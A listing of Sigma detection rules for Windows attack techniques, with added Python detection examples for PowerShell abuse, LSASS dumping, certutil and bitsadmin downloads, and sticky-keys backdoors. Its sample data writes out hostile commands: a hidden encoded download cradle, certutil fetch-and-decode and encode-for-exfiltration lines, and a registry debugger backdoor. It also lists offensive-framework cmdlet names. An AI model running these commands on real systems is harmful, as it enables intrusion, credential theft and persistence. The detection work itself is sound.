Sigma Rules
638 rules found for "Florian Roth (Nextron Systems)"
Suspicious PowerShell Invocations - Generic - PowerShell Module
Detects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - Specific - PowerShell Module
Detects suspicious PowerShell invocation command parameters
AMSI Bypass Pattern Assembly GetType
Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
Certificate Exported Via PowerShell - ScriptBlock
Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
HackTool - Rubeus Execution - ScriptBlock
Detects the execution of the hacktool Rubeus using specific command line flags
Malicious PowerShell Commandlets - ScriptBlock
Detects cmdlet names from well-known PowerShell exploitation frameworks
Malicious PowerShell Keywords
Detects keywords from well-known PowerShell exploitation frameworks
PowerShell Credential Prompt
Detects PowerShell calling a credential prompt
PowerShell PSAttack
Detects the use of PSAttack PowerShell hack tool
PowerShell ShellCode
Detects Base64-encoded shellcode
Suspicious PowerShell Download - Powershell Script
Detects suspicious PowerShell download command
PowerShell Get-Process LSASS in ScriptBlock
Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
Suspicious PowerShell Invocations - Generic
Detects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - Specific
Detects suspicious PowerShell invocation command parameters
Potential Suspicious PowerShell Keywords
Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
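The PowerShell rules above (suspicious invocation parameters, suspicious download, malicious keywords and cmdlets) all look at the same thing from different angles: the parameters on the powershell.exe command line and the script text, which is often hidden behind -EncodedCommand. The following Python is an added example, not the rules' own logic, that decodes an encoded command (Base64 over UTF-16LE, which is what -EncodedCommand expects) and then applies the three checks to the recovered script. The parameter aliases, cradle patterns and cmdlet list are assumed short lists for the example; the sample command lines are constructed, not real telemetry.

```python
import base64
import re

# Parameter spellings commonly seen in malicious invocations. PowerShell
# accepts any unambiguous prefix of a parameter name, so a production rule
# must cover more forms than this assumed table.
PARAM_ALIASES = {
    "-noprofile": "NoProfile", "-nop": "NoProfile",
    "-noninteractive": "NonInteractive", "-noni": "NonInteractive",
    "-windowstyle": "WindowStyle", "-win": "WindowStyle", "-w": "WindowStyle",
    "-executionpolicy": "ExecutionPolicy", "-exec": "ExecutionPolicy", "-ep": "ExecutionPolicy",
    "-encodedcommand": "EncodedCommand", "-enc": "EncodedCommand", "-ec": "EncodedCommand",
    "-e": "EncodedCommand",
}
# Download-cradle fragments and offensive-framework cmdlet names (assumed
# short lists for this example, not the rules' own lists).
CRADLE_PATTERNS = [r"net\.webclient", r"\.downloadstring\(", r"\.downloadfile\(",
                   r"invoke-webrequest", r"\biwr\b", r"start-bitstransfer",
                   r"\biex\b", r"invoke-expression"]
FRAMEWORK_CMDLETS = ["invoke-mimikatz", "invoke-shellcode", "invoke-reflectivepeinjection",
                     "invoke-kerberoast", "get-gpppassword"]


def encode_command(script):
    """Build the -EncodedCommand argument: Base64 over the UTF-16LE script bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Reverse of encode_command; raises ValueError on malformed input."""
    return base64.b64decode(blob).decode("utf-16-le")


def analyze_powershell(cmdline):
    """Report on one powershell.exe command line: suspicious parameters used,
    the decoded script (when -EncodedCommand was used) and which cradle /
    framework indicators appear in the script text."""
    toks = re.findall(r'"[^"]*"|\S+', cmdline)
    report = {"params": [], "decoded": None, "cradle": [], "cmdlets": []}
    for i, tok in enumerate(toks):
        canon = PARAM_ALIASES.get(tok.lower())
        if canon is None:
            continue
        nxt = toks[i + 1].strip('"') if i + 1 < len(toks) else ""
        if canon == "WindowStyle" and nxt.lower() == "hidden":
            report["params"].append("WindowStyle Hidden")
        elif canon == "ExecutionPolicy" and nxt.lower() in ("bypass", "unrestricted"):
            report["params"].append("ExecutionPolicy " + nxt.capitalize())
        elif canon == "EncodedCommand" and nxt:
            report["params"].append("EncodedCommand")
            try:
                report["decoded"] = decode_command(nxt)
            except ValueError:
                report["decoded"] = None  # malformed blob: nothing to inspect, flag stays
        elif canon in ("NoProfile", "NonInteractive"):
            report["params"].append(canon)
    # Inspect the decoded script when there is one, otherwise the raw command line.
    text = (report["decoded"] or cmdline).lower()
    report["cradle"] = [p for p in CRADLE_PATTERNS if re.search(p, text)]
    report["cmdlets"] = [c for c in FRAMEWORK_CMDLETS if c in text]
    # Two or more evasion-style parameters, or any cradle / framework hit, flags the event.
    report["suspicious"] = len(report["params"]) >= 2 or bool(report["cradle"]) or bool(report["cmdlets"])
    return report


# Constructed sample command lines (not real telemetry).
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
MALICIOUS_CMDLINE = "powershell.exe -nop -w hidden -ep bypass -enc " + encode_command(SCRIPT)
BENIGN_CMDLINE = 'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Scripts\\Backup.ps1"'

if __name__ == "__main__":
    for line in (MALICIOUS_CMDLINE, BENIGN_CMDLINE):
        print(analyze_powershell(line))
```

Note that the benign line uses -NoProfile too; one parameter alone is not enough to fire, which is why the example counts parameters rather than alerting on any single one.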
HackTool - SysmonEnte Execution
Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon
LSASS Memory Access by Tool With Dump Keyword In Name
Detects LSASS process access requests from a source process with the "dump" keyword in its image name.
Potentially Suspicious GrantedAccess Flags On LSASS
Detects process access requests to LSASS process with potentially suspicious access flags
Credential Dumping Attempt Via WerFault
Detects an LSASS process memory dump by Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr, based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll, on Windows 10, Server 2016 and later.
LSASS Access From Potentially White-Listed Processes
Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
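The four LSASS rules above operate on Sysmon Event ID 10 (ProcessAccess) records and combine three signals: the "dump" keyword in the source image name, the access mask in GrantedAccess, and debug-helper modules in the CallTrace. The Python below is an added example of that logic, not the rules' own detection, run over constructed event records. It also shows the point of the "white-listed processes" rule: an exclusion for a known benign source must be keyed on the full path, so a copy of the binary name in another directory does not inherit it. The allow-list entry and the sample records are assumptions made for the example.

```python
# Process access right needed to read LSASS memory (from the Win32 PROCESS_* mask).
PROCESS_VM_READ = 0x0010

# Modules that MiniDumpWriteDump-style dumps pass through.
DEBUG_HELPER_MODULES = ("dbghelp.dll", "dbgcore.dll")

# Allow-list by FULL PATH, never by file name alone: a copy of a benign binary's
# name in another directory must not inherit the exclusion (assumed entry).
ALLOWED_SOURCE_PATHS = {
    r"c:\program files\windows defender\msmpeng.exe",
}


def parse_access(value):
    """GrantedAccess is logged as a hex string such as '0x1010'."""
    return int(value, 16)


def classify_lsass_access(event):
    """Return the reasons a Sysmon Event ID 10 record looks like an LSASS dump.
    An empty list means the event is not flagged."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return []
    source = event["SourceImage"].lower()
    if source in ALLOWED_SOURCE_PATHS:
        return []
    reasons = []
    access = parse_access(event["GrantedAccess"])
    if "dump" in source.rsplit("\\", 1)[-1]:
        reasons.append("'dump' keyword in source image name")
    if access & PROCESS_VM_READ:
        reasons.append("PROCESS_VM_READ requested (GrantedAccess 0x%x)" % access)
    if any(m in event["CallTrace"].lower() for m in DEBUG_HELPER_MODULES):
        reasons.append("call trace passes through dbghelp.dll/dbgcore.dll")
    return reasons


def scan_events(events):
    """Return (SourceImage, reasons) for every flagged event."""
    flagged = []
    for ev in events:
        reasons = classify_lsass_access(ev)
        if reasons:
            flagged.append((ev["SourceImage"], reasons))
    return flagged


LSASS = r"C:\Windows\System32\lsass.exe"
# Constructed Sysmon Event ID 10 records (not real telemetry).
SAMPLE_EVENTS = [
    # Routine query by a system service: no VM_READ, no debug helpers.
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\System32\KERNELBASE.dll+2c8a9"},
    # Procdump-style full dump: keyword, full access and dbgcore in the trace.
    {"SourceImage": r"C:\Users\bob\Downloads\procdump64.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\System32\dbgcore.dll+1c2b"},
    # Defender from its real install path: allow-listed by full path.
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\System32\KERNELBASE.dll+2c8a9"},
    # Benign file name dropped into a temp folder: the exclusion must not apply.
    {"SourceImage": r"C:\Temp\TrolleyExpress.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\System32\dbghelp.dll+5a8f"},
]

if __name__ == "__main__":
    for image, reasons in scan_events(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

GrantedAccess 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) on its own is requested by many legitimate services and is deliberately not a reason here; 0x1010 adds PROCESS_VM_READ, which is what a dump needs.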
Potential DLL Injection Via AccCheckConsole
Detects the execution of "AccCheckConsole", a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests this checker can run is called a "verification routine", which checks things like Consistency, Navigation, etc. The tool allows a user to provide a DLL containing a custom "verification routine". An attacker can build such a DLL and pass it via the CLI, and it is then loaded in the context of the "AccCheckConsole" utility.
Suspicious Download From Direct IP Via Bitsadmin
Detects usage of bitsadmin downloading a file from a URL that contains an IP address
Suspicious Download From File-Sharing Website Via Bitsadmin
Detects usage of bitsadmin downloading a file from a suspicious domain
File With Suspicious Extension Downloaded Via Bitsadmin
Detects usage of bitsadmin downloading a file with a suspicious extension
File Download Via Bitsadmin To A Suspicious Target Folder
Detects usage of bitsadmin downloading a file to a suspicious target folder
File Download with Headless Browser
Detects execution of a Chromium-based browser in headless mode using the "dump-dom" command line to download files
File Download From Browser Process Via Inline URL
Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
Suspicious Calculator Usage
Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
File Decoded From Base64/Hex Via Certutil.EXE
Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
Suspicious Download Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files.
File Encoded To Base64 Via Certutil.EXE
Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
Certificate Exported Via Certutil.EXE
Detects the execution of certutil with the "exportPFX" flag, which allows the utility to export certificates.
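The bitsadmin rules (direct-IP URL, file-sharing domain, suspicious extension, suspicious target folder) and the certutil rules (decode/decodehex, urlcache/verifyctl download, encode, exportPFX) are all process-creation rules keyed on the binary name plus particular switches and arguments. The Python below is an added example, not the rules' own logic, that normalises a Windows command line and applies those checks. The domain, extension and folder lists are assumed short lists for the example (the rules carry their own), and the events are constructed. certutil accepts both "-" and "/" as the switch prefix, which the normalisation handles.

```python
import re

DIRECT_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?=[/:]|$)", re.I)
# Assumed lists for this example; the rules carry their own, longer ones.
FILE_SHARING_DOMAINS = ("transfer.sh", "anonfiles.com", "pastebin.com", "mega.nz")
SUSPICIOUS_EXTENSIONS = (".exe", ".dll", ".ps1", ".vbs", ".hta", ".bat", ".zip", ".7z")
SUSPICIOUS_FOLDERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\",
                      "\\programdata\\", "\\windows\\tasks\\")


def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments whole."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def switches(toks):
    """certutil accepts both '-flag' and '/flag'; normalise to the bare lower-case name."""
    return {t.lstrip("-/").lower() for t in toks if t and t[0] in "-/"}


def detect_lolbin(image, cmdline):
    """Return the detection names triggered by one process-creation event."""
    exe = image.rsplit("\\", 1)[-1].lower()
    toks = tokens(cmdline)
    sw = switches(toks)
    hits = []
    if exe == "certutil.exe":
        if sw & {"decode", "decodehex"}:
            hits.append("certutil: file decoded from base64/hex")
        if "encode" in sw:
            hits.append("certutil: file encoded to base64")
        if "exportpfx" in sw:
            hits.append("certutil: certificate exported")
        # -urlcache -f <url> <file> and -verifyctl -f <url> both fetch from the network.
        if sw & {"urlcache", "verifyctl"} and "f" in sw and "://" in cmdline:
            hits.append("certutil: download via urlcache/verifyctl")
    elif exe == "bitsadmin.exe" and sw & {"transfer", "addfile"}:
        urls = [t.strip('"') for t in toks if "://" in t]
        dest = toks[-1].strip('"').lower() if toks else ""  # local path is the last argument
        if any(DIRECT_IP_URL.match(u) for u in urls):
            hits.append("bitsadmin: download from direct IP")
        if any(d in u.lower() for u in urls for d in FILE_SHARING_DOMAINS):
            hits.append("bitsadmin: download from file-sharing site")
        if dest.endswith(SUSPICIOUS_EXTENSIONS):
            hits.append("bitsadmin: suspicious file extension")
        if any(f in dest for f in SUSPICIOUS_FOLDERS):
            hits.append("bitsadmin: suspicious target folder")
    return hits


def scan(events):
    """events: iterable of (Image, CommandLine). Returns (CommandLine, hits) for flagged ones."""
    out = []
    for image, cmdline in events:
        hits = detect_lolbin(image, cmdline)
        if hits:
            out.append((cmdline, hits))
    return out


# Constructed process-creation events (not real telemetry).
CERTUTIL = r"C:\Windows\System32\certutil.exe"
BITSADMIN = r"C:\Windows\System32\bitsadmin.exe"
SAMPLE_EVENTS = [
    (CERTUTIL, r"certutil -urlcache -f http://203.0.113.10/payload.txt C:\Users\Public\p.txt"),
    (CERTUTIL, r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe"),
    (CERTUTIL, r"certutil -encode C:\Finance\q3.xlsx C:\Users\Public\q3.txt"),
    (CERTUTIL, r"certutil -p Passw0rd -exportPFX My 1a2b3c4d C:\Users\Public\c.pfx"),
    (BITSADMIN, r"bitsadmin /transfer upd /download /priority high http://198.51.100.7/u.exe C:\Users\bob\AppData\Local\Temp\u.exe"),
    (BITSADMIN, r"bitsadmin /transfer docs https://dl.example.com/readme.txt C:\Users\bob\Documents\readme.txt"),
    (CERTUTIL, r"certutil -verify C:\certs\root.cer"),  # benign verification, no hit
]

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(hits))
```

The first four certutil lines reproduce the download-then-decode chain the descriptions warn about: fetch an encoded payload, decode it to an executable, and, in the other direction, encode a document before exfiltration.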
Suspicious CodePage Switch Via CHCP
Detects a code page switch in command line or batch scripts to a rare language
Process Access via TrolleyExpress Exclusion
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
Command Line Execution with Suspicious URL and AppData Strings
Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters, as used by several droppers (js/vbs > powershell)
Cmd.EXE Missing Space Characters Execution Anomaly
Detects Windows command lines that lack a space before or after the /c flag when running a command with cmd.exe. This could be a sign of obfuscation or a fat-finger problem (a typo by the developer).
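The anomaly above is purely lexical, so it is a good fit for two regular expressions: one for a switch glued to the binary name ("cmd.exe/c whoami") and one for an argument glued to the switch ("cmd /cwhoami"). The Python below is an added example of that check, not the rule's own pattern list; it assumes the three command-running switches /c, /k and /r and uses constructed command lines. The word boundary before "cmd" keeps unrelated binaries such as "runcmd.exe" out.

```python
import re

# Missing space BEFORE the switch: "cmd.exe/c whoami", "cmd/k ...".
# Missing space AFTER the switch: "cmd.exe /cwhoami". A quote directly after
# the switch ("/c"dir"") is flagged too; treat it as a lower-confidence hit.
# The switches cmd.exe runs commands with are /c, /k and /r (assumed set).
NO_SPACE_BEFORE = re.compile(r"\bcmd(?:\.exe)?/[ckr]", re.I)
NO_SPACE_AFTER = re.compile(r"\bcmd(?:\.exe)?\s+/[ckr](?=\S)", re.I)


def cmd_space_anomalies(cmdline):
    """Return the anomalies found in one command line (empty list = normal)."""
    found = []
    if NO_SPACE_BEFORE.search(cmdline):
        found.append("no space before /c, /k or /r")
    if NO_SPACE_AFTER.search(cmdline):
        found.append("no space after /c, /k or /r")
    return found


def scan(cmdlines):
    """Return (cmdline, anomalies) for every command line that has at least one."""
    out = []
    for cmdline in cmdlines:
        anomalies = cmd_space_anomalies(cmdline)
        if anomalies:
            out.append((cmdline, anomalies))
    return out


# Constructed command lines (not real telemetry).
SAMPLES = [
    r"C:\Windows\System32\cmd.exe/c whoami",       # space missing before /c
    r"cmd /cwhoami /all",                           # space missing after /c
    r"cmd/k ping 127.0.0.1",                        # space missing before /k
    r"cmd.exe /c whoami",                           # normal
    r'cmd.exe /k "echo hello"',                     # normal, quoted argument
    r"C:\Program Files\App\runcmd.exe /c start",   # different binary, not cmd.exe
]

if __name__ == "__main__":
    for cmdline, anomalies in scan(SAMPLES):
        print(cmdline, "->", "; ".join(anomalies))
```

Because cmd.exe really does accept both forms, a hit proves nothing on its own; as the description says, it may be a typo in a legitimate script, so the parent process and the command that follows the switch decide whether it is worth an alert.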
NtdllPipe Like Activity Execution
Detects commands that type the content of ntdll.dll into a different file or a pipe in order to evade AV/EDR detection, as seen in the NtdllPipe PoC
Sticky Key Like Backdoor Execution
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
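The backdoor described above registers a "Debugger" value under the Image File Execution Options key of an accessibility helper (sethc.exe, utilman.exe and the like) so that the logon-screen hotkey launches the attacker's program instead. It shows up in two places: the "reg add" command line at process creation, and the registry value-set event (Sysmon Event ID 13). The Python below is an added example, not the rule's own logic, that checks both forms; the list of accessibility binaries is the well-known set but is an assumption for the example, and the events are constructed.

```python
import re

# Accessibility helpers launchable from the logon screen (Shift x5, Win+U, etc.).
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe")
IFEO_MARKER = "\\image file execution options\\"


def ifeo_target(key_path):
    """Return the accessibility binary an IFEO key path names, or None."""
    low = key_path.strip('"').lower()
    pos = low.find(IFEO_MARKER)
    if pos < 0:
        return None
    subkey = low[pos + len(IFEO_MARKER):].strip("\\").split("\\")[0]
    return subkey if subkey in ACCESSIBILITY_BINARIES else None


def check_registry_event(target_object, details):
    """Sysmon Event ID 13 (value set): flag a Debugger value under an
    accessibility binary's IFEO key. Returns (binary, debugger) or None."""
    if not target_object.lower().endswith("\\debugger"):
        return None
    name = ifeo_target(target_object)
    return (name, details) if name else None


def check_command_line(cmdline):
    """Process creation: flag 'reg add <IFEO key> /v Debugger ...'.
    Returns (binary, debugger) or None."""
    toks = re.findall(r'"[^"]*"|\S+', cmdline)
    if len(toks) < 3:
        return None
    exe = toks[0].strip('"').rsplit("\\", 1)[-1].lower()
    if exe not in ("reg", "reg.exe") or toks[1].lower() != "add":
        return None
    name = ifeo_target(toks[2])
    if name is None:
        return None
    low = [t.lower() for t in toks]

    def arg_after(flag):
        if flag not in low or low.index(flag) + 1 >= len(toks):
            return None
        return toks[low.index(flag) + 1].strip('"')

    if (arg_after("/v") or "").lower() != "debugger":
        return None
    return (name, arg_after("/d") or "")


# Constructed events (not real telemetry).
IFEO = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SAMPLE_COMMAND_LINES = [
    # Classic sticky-keys backdoor: cmd.exe becomes the "debugger" of sethc.exe.
    r'reg add "' + IFEO + r'\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f',
    # IFEO debugger on a non-accessibility binary: outside this rule's scope.
    r'reg add "' + IFEO + r'\notepad.exe" /v Debugger /t REG_SZ /d "C:\Tools\dbg.exe" /f',
    # Another IFEO value on an accessibility binary, but not Debugger.
    r'reg add "' + IFEO + r'\osk.exe" /v GlobalFlag /t REG_DWORD /d 0x200 /f',
]
SAMPLE_REGISTRY_EVENTS = [
    (IFEO + r"\utilman.exe\Debugger", r"C:\Windows\System32\cmd.exe"),
    (IFEO + r"\osk.exe\GlobalFlag", "DWORD (0x00000200)"),
]

if __name__ == "__main__":
    for cmdline in SAMPLE_COMMAND_LINES:
        print(check_command_line(cmdline))
    for target, details in SAMPLE_REGISTRY_EVENTS:
        print(check_registry_event(target, details))
```

Checking the registry event as well as the command line matters because the value can be set without reg.exe at all (PowerShell, a remote registry call, a direct API call), and the Event ID 13 record catches all of those.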
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
Detects usage of cmdkey to look for cached credentials on the system
CreateDump Process Dump
Detects use of the createdump.exe LOLBIN utility to dump process memory
Dynamic .NET Compilation Via Csc.EXE
Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
Csc.EXE Execution From Potentially Suspicious Parent
Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
Suspicious Curl.EXE Download
Detects a suspicious curl process start on Windows that writes the requested document to a local file
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
Suspicious Desktopimgdownldr Command
Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
Arbitrary MSI Download Via Devinit.EXE
Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
Suspicious Kernel Dump Using Dtrace
Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1